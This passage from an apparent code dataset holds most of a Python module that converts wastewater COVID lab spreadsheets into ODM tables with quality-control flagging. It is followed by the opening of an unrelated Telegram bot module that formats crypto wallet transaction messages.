sample_type):\n        df = pd.concat([start_col, end_col, sample_type], axis=1)\n        df.columns = [\"start\", \"end\", \"type\"]\n        df[\"s\"] = df.apply(\n            lambda row: utilities.calc_start_date(row[\"end\"], row[\"type\"]), axis=1\n        )\n        return df[\"s\"]\n\n    @classmethod\n    def get_grab_date(cls, end_series, type_series):\n        df = pd.concat([end_series, type_series], axis=1)\n        df.columns = [\"end\", \"type\"]\n        df[\"date_grab\"] = pd.NaT\n        filt = df[\"type\"].str.contains(\"grb\")\n        df.loc[filt, \"date_grab\"] = df.loc[filt, \"end\"]\n        return df[\"date_grab\"]\n\n    @classmethod\n    def get_collection_method(cls, collection):\n        def check_collection_method(x):\n            if (\n                re.match(r\"cp[tf]p[0-9]+h\", x)\n                or x == \"grb\"\n                or re.match(r\"ps[0-9]+h\", x)\n            ):\n                return x\n            elif \"grb\" in x:\n                added_bit = x[len(\"grb\") :]\n                return \"grb\" + \"cp\" + added_bit\n            else:\n                return \"\"\n\n        collection = collection.str.strip()\n        collection = collection.apply(lambda x: check_collection_method(x))\n        return collection\n\n    @classmethod\n    def get_assay_method_id(cls, sample_type, concentration_method, assay_date):\n        formatted_date = 
CsvMapper.str_date_from_timestamp(assay_date)\n clean_series = []\n for series in [sample_type, concentration_method, formatted_date]:\n series = series.fillna(\"\").astype(str)\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n return df.agg(\"_\".join, axis=1)\n\n @classmethod\n def get_assay_instrument(cls, static_methods, sample_type, concentration_method):\n clean_series = []\n for series in [sample_type, concentration_method]:\n series = series.fillna(\"\").astype(str)\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n df[\"general_id\"] = df.agg(\"_\".join, axis=1).str.lower()\n merged = pd.merge(\n left=static_methods,\n right=df,\n left_on=\"assayMethodID\",\n right_on=\"general_id\",\n )\n return merged[\"instrumentID\"].fillna(\"\")\n\n @classmethod\n def get_assay_name(cls, static_methods, sample_type, concentration_method):\n clean_series = []\n for series in [sample_type, concentration_method]:\n series = series.fillna(\"\").astype(str)\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n df[\"general_id\"] = df.agg(\"_\".join, axis=1).str.lower()\n merged = pd.merge(\n left=static_methods,\n right=df,\n left_on=\"assayMethodID\",\n right_on=\"general_id\",\n )\n return merged[\"name\"].fillna(\"\")\n\n @classmethod\n def write_concentration_method(cls, conc_method, conc_volume, ph_final):\n clean_series = []\n names = [\"conc\", \"conc_volume\", \"ph_final\"]\n for series, name in zip([conc_method, conc_volume, ph_final], names):\n series = series.fillna(\"unknown\").astype(str)\n series.name = name\n clean_series.append(series)\n df = pd.concat(clean_series, axis=1)\n\n df[\"text\"] = df.apply(\n lambda row: f\"{row['conc']}, Volume:{row['conc_volume']} mL, Final pH:{row['ph_final']}\", # noqa\n axis=1,\n )\n return df[\"text\"]\n\n @classmethod\n def get_site_id(cls, labels):\n def extract_from_label(label_id):\n if re.match(LABEL_REGEX, label_id):\n label_parts = label_id.split(\"_\")\n return \"_\".join(label_parts[:2])\n else:\n return \"\"\n\n clean_label_series = labels.apply(lambda x: cls.clean_labels(x))\n return clean_label_series.apply(lambda x: extract_from_label(x))\n\n @classmethod\n def sample_is_pooled(cls, pooled):\n # It isn't clear what the sheet wants the user to do - either say \"Yes\"\n # if the sample is pooled, or actually put in the sample ids\n # of the children. 
For now, let's only check if it is pooled or not\n        return pooled != \"\"\n\n    @classmethod\n    def get_children_samples(cls, pooled, sample_date):\n        def make_children_ids(row):\n            split_pooled = row[\"pooled\"].split(\",\") if \",\" in row[\"pooled\"] else \"\"\n            children_ids = [\n                \"_\".join([item, row[\"clean_date\"]])\n                for item in split_pooled\n                if re.match(LABEL_REGEX, item)\n            ]\n            return \",\".join(children_ids) if children_ids else \"\"\n\n        clean_date = CsvMapper.str_date_from_timestamp(sample_date)\n        df = pd.concat([pooled, clean_date], axis=1)\n        df.columns = [\"pooled\", \"clean_date\"]\n        df[\"children_ids\"] = df.apply(lambda row: make_children_ids(row), axis=1)\n        return df[\"children_ids\"]\n\n    @classmethod\n    def get_sample_id(cls, label_id, sample_date, spike_batch, lab_id, sample_index):\n        # TODO: Deal with index once it's been implemented in McGill sheet\n        clean_date = CsvMapper.str_date_from_timestamp(sample_date)\n        clean_label = label_id.apply(lambda x: cls.clean_labels(x))\n\n        df = pd.concat([clean_label, clean_date, spike_batch], axis=1)\n        df[\"lab_id\"] = lab_id\n        df[\"index_no\"] = (\n            sample_index.astype(str)\n            if isinstance(sample_index, pd.Series)\n            else str(sample_index)\n        )\n\n        df.columns = [\"clean_label\", \"clean_date\", \"spike_batch\", \"lab_id\", \"index_no\"]\n        df[\"sample_ids\"] = \"\"\n        regex_filt = df[\"clean_label\"].str.match(LABEL_REGEX, case=False)\n\n        df.loc[regex_filt, \"sample_ids\"] = df.loc[\n            regex_filt, [\"clean_label\", \"clean_date\", \"index_no\"]\n        ].agg(\"_\".join, axis=1)\n\n        df.loc[~regex_filt, \"sample_ids\"] = df.loc[\n            ~regex_filt, [\"lab_id\", \"spike_batch\", \"clean_label\", \"index_no\"]\n        ].agg(\"_\".join, axis=1)\n        return df[\"sample_ids\"]\n\n    @classmethod\n    def get_wwmeasure_id(\n        cls,\n        label_id,\n        sample_date,\n        spike_batch,\n        lab_id,\n        sample_index,\n        meas_type,\n        meas_date,\n        index,\n    ):\n        # TODO: Deal with index once it's been implemented in McGill sheet\n        sample_id = cls.get_sample_id(\n            label_id, sample_date, spike_batch, lab_id, sample_index\n        )\n        meas_date = CsvMapper.str_date_from_timestamp(meas_date)\n        df = pd.concat([sample_id, meas_date], axis=1)\n        df[\"meas_type\"] = meas_type\n        df[\"index_no\"] = (\n            index.astype(str) if isinstance(index, pd.Series) else str(index)\n        )\n\n        return df.agg(\"_\".join, axis=1)\n\n    @classmethod\n    def get_reporter_id(cls, static_reporters, name):\n        def get_reporter_name(x):\n            reporters_w_name = static_reporters.loc[\n                static_reporters[\"reporterID\"].str.lower().str.contains(x)\n            ]\n            if len(reporters_w_name) > 0:\n                return reporters_w_name.iloc[0][\"reporterID\"]\n            else:\n                return x\n\n        name = name.str.replace(\", \", \"/\").str.replace(\",\", \"/\").str.replace(\";\", \"/\")\n        name = name.str.lower().apply(lambda x: x.split(\"/\")[0] if \"/\" in x else x)\n        name = name.str.strip()\n        reporters_ids = name.apply(get_reporter_name)\n        return reporters_ids\n\n    @classmethod\n    def has_quality_flag(cls, flag):\n        negative_flags = [\"\", \"0\", \"no\", \"n\", \"f\", \"false\", \"none\", \"nan\"]\n        return ~flag.astype(str).str.lower().isin(negative_flags)\n\n    @classmethod\n    def get_sample_volume(cls, vols, default):\n        vols = vols.apply(lambda x: default if pd.isna(x) else x)\n        return vols\n\n    @classmethod\n    def get_field_sample_temp(cls, series):\n        temp_map = {\n            \"refrigerated\": 4.0,\n            \"ice\": 0.0,\n            \"norefrigaration\": 20.0,\n            # \"norefrigeration\": np.nan\n        }\n        series = series.str.lower().map(temp_map)\n        return series\n\n    @classmethod\n    def get_shipped_on_ice(cls, series):\n        series = series.str.lower()\n        map_to = 
{\"yes\": True, \"no\": False}\n return series.map(map_to)\n\n @classmethod\n def grant_access(cls, access):\n return access.str.lower().isin([\"\", \"1\", \"yes\", \"true\"])\n\n @classmethod\n def validate_fraction_analyzed(cls, series):\n filt = (\n series.str.contains(\"mixed\")\n | series.str.contains(\"liquid\")\n | series.str.contains(\"solids\")\n )\n series.loc[~filt] = \"\"\n return series\n\n @classmethod\n def validate_value(cls, values):\n return pd.to_numeric(values, errors=\"coerce\")\n\n @classmethod\n def get_lab_id(cls, lab_id):\n if isinstance(lab_id, str):\n return lab_id.lower().strip()\n elif isinstance(lab_id, pd.Series):\n return lab_id.str.lower().strip()\n raise TypeError(f\"What is this lab_id?: {lab_id}\")\n\n\ndef append_new_entry(new_entry, current_table_data):\n if current_table_data is None:\n new_entry = {0: new_entry}\n return pd.DataFrame.from_dict(new_entry, orient=\"index\")\n new_index = current_table_data.index.max() + 1\n current_table_data.loc[new_index] = new_entry\n return current_table_data\n\n\ndef get_lod(lab, label_col_name, spike_col_name, lod_value_col):\n new_cols = [\"LOD\"]\n filt = lab[label_col_name] == \"negative\"\n cols_to_keep = [\n label_col_name,\n spike_col_name,\n lod_value_col,\n ]\n lod_df = lab.loc[filt][cols_to_keep]\n for col in new_cols:\n lab.loc[:, col] = np.nan\n lod_df[spike_col_name] = lod_df[spike_col_name].replace(\"\", np.nan)\n lod_df = lod_df.dropna(subset=[spike_col_name])\n spike_ids = list(lod_df[spike_col_name].dropna().unique())\n for spike_id in spike_ids:\n lod_filt = lod_df[spike_col_name] == spike_id\n lab_filt = lab[spike_col_name] == spike_id\n lod = lod_df.loc[lod_filt].iloc[0].loc[lod_value_col]\n for col in new_cols:\n lab.loc[lab_filt, col] = lod\n return lab\n\n\ndef get_loq(lab):\n lab[\"LOQ\"] = np.nan\n return lab\n\n\ndef validate_date_text(date_text):\n date_text = str(date_text)\n try:\n if date_text != datetime.strptime(date_text, \"%Y-%m-%d\").strftime(\"%Y-%m-%d\"):\n raise ValueError\n return True\n except ValueError:\n return False\n\n\ndef remove_bad_rows(lab):\n \"\"\" \"LabelID column should contain something for all valid rows.\n If it's something else than an empty value and that this empty value\n doesn't cast to datetime, the row should be deleted\"\"\"\n LABEL_ID_COL = \"D\"\n filt1 = ~pd.isnull(lab[LABEL_ID_COL])\n filt2 = ~lab[LABEL_ID_COL].str.lower().str.contains(\"reference\").astype(bool)\n filt3 = ~lab[LABEL_ID_COL].str.lower().str.contains(\"negative\").astype(bool)\n return lab.loc[filt1 & filt2 & filt3]\n\n\ndef get_labsheet_inputs(map_row, lab_data, lab_id):\n lab_input = map_row[\"labInputs\"]\n if lab_input == \"\":\n return None\n var_name = map_row[\"variableName\"]\n raw_inputs = lab_input.split(\";\")\n final_inputs = []\n for input_ in raw_inputs:\n if re.match(r\"__const__.*:.*\", input_):\n value, type_ = input_[len(\"__const__\") :].split(\":\")\n if type_ == \"str\":\n value = str(value)\n elif type_ == \"int\":\n value = int(value)\n elif input_ == \"__labID__\":\n value = lab_id\n elif input_ == \"__varName__\":\n value = var_name\n elif input_ == \"__default__\":\n value = map_row[\"defaultValue\"]\n else:\n value = lab_data[input_]\n final_inputs.append(value)\n return tuple(final_inputs)\n\n\ndef get_static_inputs(map_row, static_data):\n input_sources = map_row[\"inputSources\"]\n if \"static\" in input_sources:\n static_table = input_sources.split(\"+\")[0]\n static_table = static_table[len(\"static \") :]\n return static_data[static_table]\n else:\n 
return None\n\n\ndef get_all_inputs(row):\n static_input = row[\"static\"]\n lab_inputs = row[\"lab_arguments\"]\n if static_input is None and lab_inputs is None:\n inputs = None\n elif static_input is None:\n inputs = lab_inputs\n else:\n inputs = (static_input, *lab_inputs)\n if inputs is None:\n inputs = (row[\"defaultValue\"],)\n return inputs\n\n\ndef parse_sheet(\n mapping,\n static,\n lab_data,\n processing_functions,\n lab_id,\n):\n mapping[\"lab_arguments\"] = mapping.apply(\n lambda row: get_labsheet_inputs(row, lab_data, lab_id), axis=1\n )\n mapping[\"static\"] = mapping.apply(\n lambda row: get_static_inputs(row, static), axis=1\n )\n mapping[\"final_inputs\"] = mapping.apply(lambda row: get_all_inputs(row), axis=1)\n mapping[\"func\"] = mapping[\"processingFunction\"].apply(\n lambda x: processing_functions.get(x, CsvMapper.pass_raw)\n )\n\n mapping[\"columnName\"] = mapping[[\"table\", \"elementName\", \"variableName\"]].agg(\n \"_\".join, axis=1\n )\n to_apply = mapping.loc[:, [\"columnName\", \"func\", \"final_inputs\"]]\n for _, apply_row in to_apply.iterrows():\n col_name = apply_row[\"columnName\"]\n lab_data[col_name] = apply_row[\"func\"](*apply_row[\"final_inputs\"])\n tables = {table: pd.DataFrame() for table in mapping[\"table\"].unique()}\n for table in tables:\n elements = mapping.loc[mapping[\"table\"] == table, \"elementName\"].unique()\n sub_dfs = []\n for element in elements:\n table_element_filt = (mapping[\"table\"] == table) & (\n mapping[\"elementName\"] == element\n )\n col_names = mapping.loc[table_element_filt, \"columnName\"]\n var_names = mapping.loc[table_element_filt, \"variableName\"]\n sub_df = lab_data[col_names]\n sub_df.columns = var_names\n sub_dfs.append(sub_df)\n table_df = pd.concat(sub_dfs, axis=0, ignore_index=True)\n if table in [\"WWMeasure\", \"SiteMeasure\"]:\n table_df = table_df.dropna(subset=[\"value\"])\n tables[table] = table_df\n return tables\n\n\nclass QcChecker:\n def __init__(self, version: Literal[2021, 2022], date_check: bool):\n self.version = version\n self.date_check = date_check\n\n def _find_df_borders(self, sheet_cols, idx_col_pos):\n pos_of_cols_w_headers = []\n for i, col in enumerate(sheet_cols):\n if i == idx_col_pos:\n continue\n if \"Unnamed\" not in col:\n pos_of_cols_w_headers.append(i + 1)\n last_sheet_col = len(sheet_cols)\n pos_of_cols_w_headers.append(last_sheet_col)\n\n xl_start_cols = []\n xl_end_cols = []\n\n pos_of_last_item = len(pos_of_cols_w_headers) - 1\n for i in range(len(pos_of_cols_w_headers.copy())):\n if i == pos_of_last_item:\n # This is the end of the last df, so stop\n break\n\n start_pos = pos_of_cols_w_headers[i]\n\n if i == pos_of_last_item - 1:\n end_pos = pos_of_cols_w_headers[i + 1]\n\n else:\n end_pos = pos_of_cols_w_headers[i + 1] - 1\n\n start_idx = CsvMapper.excel_style(start_pos + 1)\n end_idx = CsvMapper.excel_style(end_pos + 1)\n xl_start_cols.append(start_idx)\n xl_end_cols.append(end_idx)\n return xl_start_cols, xl_end_cols\n\n def _get_type_codes(self, sheet_df):\n return sheet_df.iloc[1].dropna().to_list()\n\n def _get_sample_collection(self, type_codes):\n return [str(x).lower() for x in type_codes[::3]]\n\n def _get_last_dates(self, sheet_df):\n dates = sheet_df.iloc[2].dropna().to_list()\n temp_dates = []\n for item in dates:\n item = pd.to_datetime(item, errors=\"raise\", infer_datetime_format=True)\n temp_dates.append(item)\n return temp_dates\n\n def _get_label_ids(self, type_codes):\n return type_codes[2::3]\n\n def _get_site_ids(self, label_ids):\n sites = []\n 
for item in label_ids:\n split = item.split(\"_\")[:2]\n site = \"_\".join(split).lower()\n sites.append(site)\n return sites\n\n def _get_values_df(self, path, sheet_name, start, end, header_row_pos):\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n return pd.read_excel(\n path,\n sheet_name=sheet_name,\n header=header_row_pos,\n usecols=f\"{start}:{end}\",\n )\n\n def _get_index_series(\n self, path: str, sheet_name: str, idx_col: str, header_row_pos: int\n ):\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n idx_series = pd.read_excel(\n path,\n sheet_name=sheet_name,\n header=header_row_pos,\n usecols=idx_col,\n squeeze=True,\n ) # type:ignore\n return pd.to_datetime(idx_series, infer_datetime_format=True)\n\n def _clean_names(self, df):\n rejected_col_template = \"Rejected by\"\n cols = df.columns\n renamed_cols = {}\n incrementer = 0\n for col in cols:\n new_col = col\n if \"rejected\" in col.lower():\n new_col = (\n f\"{rejected_col_template}.{incrementer}\"\n if incrementer\n else rejected_col_template\n )\n incrementer += 1\n elif re.match(r\".*\\.[0-9]\", col):\n dot_idx = col.find(\".\")\n new_col = col[:dot_idx]\n\n renamed_cols[col] = new_col\n return df.rename(columns=renamed_cols)\n\n def _patch_pmmv_names(self, df):\n bad_name = \"PMMoV (gc/ml)\"\n correct_name = \"PMMV (gc/ml)\"\n if bad_name in df.columns:\n df = df.rename(columns={bad_name: correct_name})\n return df\n\n def _extract_dfs(self, path, sheet_name, idx_col_pos=0, header_row_pos=4):\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n sheet_df = pd.read_excel(path, sheet_name=sheet_name, header=0, index_col=0)\n sheet_cols = [str(col) for col in sheet_df.columns]\n start_borders, end_borders = self._find_df_borders(sheet_cols, idx_col_pos)\n idx_col = CsvMapper.excel_style(idx_col_pos + 1)\n\n dfs = []\n if self.version == 2021:\n cols_to_keep = [\n \"BRSV (%rec)\",\n \"Rejected by\",\n \"PMMV (gc/ml)\",\n \"Rejected by.1\",\n \"SARS (gc/ml)\",\n \"Rejected by.2\",\n \"Quality Note\",\n ]\n elif self.version == 2022:\n cols_to_keep = [\n \"BRSV (%rec)\",\n \"Quality_flag_BRSV\",\n \"PMMV (gc/ml)\",\n \"Quality_flag_PMMoV\",\n \"SARS_N1 (gc/ml)\",\n \"Quality_flag_SARS_N1\",\n \"SARS_N2 (gc/ml)\",\n \"Quality_flag_SARS_N2\",\n \"Quality_flags_explication\",\n ]\n else:\n raise ValueError(f\"Version {self.version} not supported\")\n for start, end in zip(start_borders, end_borders):\n vals = self._get_values_df(path, sheet_name, start, end, header_row_pos)\n idx = self._get_index_series(path, sheet_name, idx_col, header_row_pos)\n df = vals.set_index(idx)\n df = self._clean_names(df)\n df = self._patch_pmmv_names(df)\n df = df.loc[:, cols_to_keep]\n df = df.dropna(how=\"all\")\n df.fillna(\"\", inplace=True)\n dfs.append(df)\n return sheet_df, dfs\n\n def _parse_dates(self, df):\n for col in df.columns:\n if \"dateTime\" in col:\n df[col] = pd.to_datetime(df[col], infer_datetime_format=True)\n return df\n\n def _validation_has_started(self, last_date):\n # If there is no 'last checked date', then validation isn't happening at this site, but the data shouldn't be removed\n return not pd.isna(pd.to_datetime(last_date, infer_datetime_format=True))\n\n def _apply_quality_checks(\n self, mapper, v_df, last_date, site_id, sample_collection\n ):\n if self.version == 2021:\n charac = {\n \"BRSV (%rec)\": {\n \"rejected_col\": \"Rejected by\",\n \"unit\": \"pctrecovery\",\n \"type\": \"brsv\",\n },\n \"PMMV (gc/ml)\": {\n 
\"rejected_col\": \"Rejected by.1\",\n \"unit\": \"gcml\",\n \"type\": \"pmmov\",\n },\n \"SARS (gc/ml)\": {\n \"rejected_col\": \"Rejected by.2\",\n \"unit\": \"gcml\",\n \"type\": \"covn1\",\n },\n }\n elif self.version == 2022:\n charac = {\n \"BRSV (%rec)\": {\n \"rejected_col\": \"Quality_flag_BRSV\",\n \"unit\": \"pctrecovery\",\n \"type\": \"brsv\",\n },\n \"PMMV (gc/ml)\": {\n \"rejected_col\": \"Quality_flag_PMMoV\",\n \"unit\": \"gcml\",\n \"type\": \"pmmov\",\n },\n \"SARS_N1 (gc/ml)\": {\n \"rejected_col\": \"Quality_flag_SARS_N1\",\n \"unit\": \"gcml\",\n \"type\": \"covn1\",\n },\n \"SARS_N2 (gc/ml)\": {\n \"rejected_col\": \"Quality_flag_SARS_N2\",\n \"unit\": \"gcml\",\n \"type\": \"covn2\",\n },\n }\n else:\n raise ValueError(f\"Version {self.version} not supported\")\n\n samples = mapper.sample.copy()\n samples = self._parse_dates(samples)\n ww = mapper.ww_measure.copy()\n\n quality_note_col = (\n \"Quality Note\" if self.version == 2021 else \"Quality_flags_explication\"\n )\n sample_collection_filt = (\n samples[\"collection\"].str.lower().str.contains(sample_collection)\n )\n sample_sites_filt = samples[\"siteID\"].str.lower().str.contains(site_id)\n for _, row in v_df.iterrows():\n sample_date_filt1 = (\n samples[\"dateTimeEnd\"].dt.date\n == pd.to_datetime(row.name, infer_datetime_format=True).date()\n )\n sample_date_filt2 = (\n samples[\"dateTime\"].dt.date\n == pd.to_datetime(row.name, infer_datetime_format=True).date()\n )\n sample_date_filt = sample_date_filt1 | sample_date_filt2\n sample_tot_filt = (\n sample_date_filt & sample_sites_filt & sample_collection_filt\n )\n\n samples.loc[sample_tot_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n row[quality_note_col],\n ]\n\n sample_list = (\n samples.loc[sample_tot_filt, \"sampleID\"].drop_duplicates().to_list()\n )\n\n for wwm_info in charac.values():\n if row[wwm_info[\"rejected_col\"]]:\n # print(\"Applying flag for \", row.name, col, row[wwm_info[\"rejected_col\"]])\n ww_type_filt = ww[\"type\"].str.lower().str.contains(wwm_info[\"type\"])\n ww_unit_filt = ww[\"unit\"].str.lower().str.contains(wwm_info[\"unit\"])\n ww_sample_filt = ww[\"sampleID\"].isin(sample_list)\n ww_tot_filt = ww_type_filt & ww_unit_filt & ww_sample_filt\n\n ww.loc[ww_tot_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n row[quality_note_col],\n ]\n\n if \"grb\" in sample_collection:\n sample_last_date_filt = samples[\"dateTime\"] > last_date\n else:\n sample_last_date_filt = samples[\"dateTimeEnd\"] > last_date\n\n if self.date_check:\n unchecked_filt = (\n sample_collection_filt & sample_sites_filt & sample_last_date_filt\n )\n samples.loc[unchecked_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n \"Unchecked viral measurements\",\n ]\n\n unchecked_sample_ids = (\n samples.loc[unchecked_filt, \"sampleID\"].drop_duplicates().to_list()\n )\n\n ww_u_type_filt = (\n ww[\"type\"].str.lower().isin([x[\"type\"] for x in charac.values()])\n )\n ww_u_sample_filt = ww[\"sampleID\"].isin(unchecked_sample_ids)\n ww.loc[ww_u_type_filt & ww_u_sample_filt, [\"qualityFlag\", \"notes\"]] = [\n True,\n \"Unchecked viral measurement\",\n ]\n\n mapper.sample = samples\n mapper.ww_measure = ww\n return mapper\n\n def read_validation(self, mapper, path, sheet_name):\n sheet_df, dfs = self._extract_dfs(path, sheet_name)\n\n last_dates = self._get_last_dates(sheet_df)\n\n type_codes = self._get_type_codes(sheet_df)\n sample_collections = self._get_sample_collection(type_codes)\n label_ids = self._get_label_ids(type_codes)\n site_ids = 
self._get_site_ids(label_ids)\n\n for v_df, last_date, site_id, sample_type in zip(\n dfs, last_dates, site_ids, sample_collections\n ):\n if not self._validation_has_started(last_date):\n continue\n mapper = self._apply_quality_checks(\n mapper, v_df, last_date, site_id, sample_type\n )\n return mapper\n\n\nclass McGillMapper(CsvMapper):\n def __init__(self, version: Literal[2021, 2022], processing_functions=MapperFuncs):\n self.version = version\n super().__init__(processing_functions=processing_functions)\n\n def get_attr_from_table_name(self, table_name: str) -> str:\n result = None\n for attr, dico in self.conversion_dict.items():\n odm_name = dico[\"odm_name\"]\n if odm_name == table_name:\n result = attr\n break\n if result is None:\n raise ValueError(f\"Could not find attribute for table {table_name}\")\n return result\n\n def read_static_data(self, staticdata_path):\n # Get the static data\n static_tables = [\n \"Lab\",\n \"Reporter\",\n \"Site\",\n \"Instrument\",\n \"Polygon\",\n \"AssayMethod\",\n ]\n attrs = []\n for table in static_tables:\n attr = self.get_attr_from_table_name(table)\n if attr is None:\n raise ValueError(f\"Could not find attribute for table {table}\")\n attrs.append(attr)\n static_data = {}\n excel_mapper = excel_template_mapper.ExcelTemplateMapper()\n if staticdata_path is not None:\n excel_mapper.read(staticdata_path, sheet_names=static_tables)\n for table, attr in zip(static_tables, attrs):\n static_data[table] = getattr(excel_mapper, attr)\n setattr(self, attr, static_data[table])\n return static_data\n\n def read(\n self,\n labsheet_path,\n staticdata_path,\n worksheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n ):\n # choose the right map file\n if self.version == 2021:\n map_path = MCGILL_MAP_2021\n col_range = \"A:BV\"\n elif self.version == 2022:\n map_path = MCGILL_MAP_2022\n col_range = \"A:CI\"\n else:\n raise ValueError(f\"Version {self.version} not supported\")\n\n # get the lab data\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"ignore\")\n lab = pd.read_excel(\n labsheet_path, sheet_name=worksheet_name, header=None, usecols=col_range\n )\n # parse the headers to deal with merged cells and get unique names\n lab.columns = self.get_excel_style_columns(lab)\n\n lab_datatypes = lab.iloc[5].values\n lab = lab.iloc[6:]\n lab = remove_bad_rows(lab)\n lab = self.typecast_lab(lab, lab_datatypes)\n # lab = lab.dropna(how=\"all\")\n mapping = pd.read_csv(map_path, header=0)\n mapping.fillna(\"\", inplace=True)\n mapping = mapping.astype(str)\n label_col_name = \"D\" # sampleID column\n spike_col_name = \"AB\" # spikeID\n lod_value_col = \"BI\" # sars-cov-2 gc/rxn\n sample_date_col = \"B\" # end date\n lab = get_lod(lab, label_col_name, spike_col_name, lod_value_col)\n lab = get_loq(lab)\n lab = self.filter_by_date(lab, sample_date_col, startdate, enddate)\n static_data = self.read_static_data(staticdata_path)\n dynamic_tables = self.parse_sheet(\n mapping, static_data, lab, self.processing_functions, lab_id\n )\n for table_name, table in dynamic_tables.items():\n attr = self.get_attr_from_table_name(table_name)\n table = self.type_cast_table(table_name, table)\n setattr(self, attr, table)\n return\n\n def validates(self):\n return True\n\n\ndef debug_test():\n mapper = McGillMapper(2021, processing_functions=MapperFuncs)\n lab_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/2021/CentrEau-COVID_Resultats_test.xlsx\" # noqa\n static_data = 
\"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/Ongoing/CentrEAU-COVID_Static_Data.xlsx\" # noqa\n sheet_name = \"QC Data Daily Samples (McGill)\"\n lab_id = \"frigon_lab\"\n mapper.read(\n lab_data,\n static_data,\n sheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n )\n print(mapper.ww_measure.loc[mapper.ww_measure[\"qualityFlag\"]])\n qc_quality_checker = QcChecker(2021, date_check=True)\n qc_lab = qc_quality_checker.read_validation(\n mapper, lab_data, \"QC_Compil_STEP (int)\"\n )\n with_flag = qc_lab.ww_measure.loc[qc_lab.ww_measure[\"qualityFlag\"]]\n print(with_flag)\n\n\ndef debug_2021():\n mapper = McGillMapper(2021, processing_functions=MapperFuncs)\n lab_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/2021/CentrEau-COVID_Resultats_Quebec_final.xlsx\" # noqa\n static_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/Ongoing/CentrEAU-COVID_Static_Data.xlsx\" # noqa\n\n sheet_name = \"QC Data Daily Samples (McGill)\"\n lab_id = \"frigon_lab\"\n mapper.read(\n lab_data,\n static_data,\n sheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n )\n print(mapper.ww_measure.loc[mapper.ww_measure[\"qualityFlag\"]])\n qc_quality_checker = QcChecker(2021, date_check=True)\n qc_lab = qc_quality_checker.read_validation(\n mapper, lab_data, \"QC_Compil_STEP (int)\"\n )\n with_flag = qc_lab.ww_measure.loc[qc_lab.ww_measure[\"qualityFlag\"]]\n print(with_flag)\n\n\ndef debug_2022():\n mapper = McGillMapper(2022, processing_functions=MapperFuncs)\n lab_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/2022/CentrEau-COVID_Resultats_Quebec_2022.xlsx\" # noqa\n static_data = \"/Users/jeandavidt/Library/CloudStorage/OneDrive-UniversitéLaval/Université/Doctorat/COVID/Latest Data/Input/Ongoing/CentrEAU-COVID_Static_Data.xlsx\" # noqa\n\n sheet_name = \"QC Data Daily Samples (McGill)\"\n lab_id = \"frigon_lab\"\n mapper.read(\n lab_data,\n static_data,\n sheet_name,\n lab_id,\n startdate=None,\n enddate=None,\n )\n print(mapper.ww_measure.loc[mapper.ww_measure[\"qualityFlag\"]])\n qc_quality_checker = QcChecker(2022, date_check=True)\n qc_lab = qc_quality_checker.read_validation(\n mapper, lab_data, \"QC_Compil_STEP (int)\"\n )\n\n print(qc_lab.ww_measure.loc[qc_lab.ww_measure[\"qualityFlag\"]])\n\n\nif __name__ == \"__main__\":\n with warnings.catch_warnings():\n warnings.filterwarnings(action=\"error\")\n # debug_test()\n debug_2021()\n # debug_2022()\n","repo_name":"modelEAU/ODM-Import","sub_path":"wbe_odm/odm_mappers/mcgill_mapper.py","file_name":"mcgill_mapper.py","file_ext":"py","file_size_in_byte":34808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"30286781122","text":"import asyncio\nimport logging\nfrom time import sleep\nfrom decimal import Decimal\n\nfrom config.celery import app\nfrom telegram_bot.loader import bot\nfrom wallets.models import WalletChain, Transaction\nfrom wallets.services.one_inch import get_one_inch_tokens\nfrom wallets.services.transactions import get_new_transactions\nfrom aiogram.utils.exceptions import ChatNotFound, RetryAfter\n\nfrom telegram_bot.utils.render import render_link\nfrom telegram_bot.loader import w3\nfrom wallets.utils import get_or_create_token_contract\n\n\ndef render_tx_native_text(tx: Transaction, chain, names):\n 
value = w3.fromWei(int(tx.value), 'ether')\n text = f'{value} {chain.upper()}({names[chain]}): '\n text += f'{round(value * Decimal(tx.native_price), 2)} USD' if value else ''\n return text\n\n\ndef render_tx_token_text(tx: Transaction, chain, names) -> str:\n token_name = tx.token_contract.symbol if tx.token_contract.symbol else ''\n value = Decimal(int(tx.value) / 10 ** tx.token_contract.decimals) if tx.token_contract.decimals else w3.fromWei(int(tx.value), 'ether')\n link = render_link(tx.token_contract.name, tx.token_contract.token_address, chain, \"token\")\n text = f'{round(value, 6)} {token_name}({link}): '\n text += f'{round(Decimal(tx.token_price) * value, 2)} USD' if tx.token_price else ''\n return text\n\n\ndef render_new_tx_text(tx: Transaction) -> str:\n tx_fee = w3.fromWei(int(tx.tx_fee), 'ether') if tx.tx_fee else ''\n my_address = tx.wallet.address.lower()\n chain = tx.wallet.chain\n names = {'eth': 'Ethereum', 'bsc': 'Binance', 'polygon': 'Polygon(Matic)'}\n text_to_type = {'token': render_tx_token_text, 'native': render_tx_native_text}\n wallet_link = render_link(tx.wallet.description, tx.wallet.address, chain, 'address')\n text = f'{wallet_link}\\n'\n if tx.to_address.lower() == my_address:\n text += f'➕{text_to_type[tx.type](tx, chain, names)}\\n' \\\n f'FROM {render_link(tx.from_address, tx.from_address, chain, \"address\")}\\n'\n elif tx.from_address.lower() == my_address:\n text += f'➖{text_to_type[tx.type](tx, chain, names)}\\n' 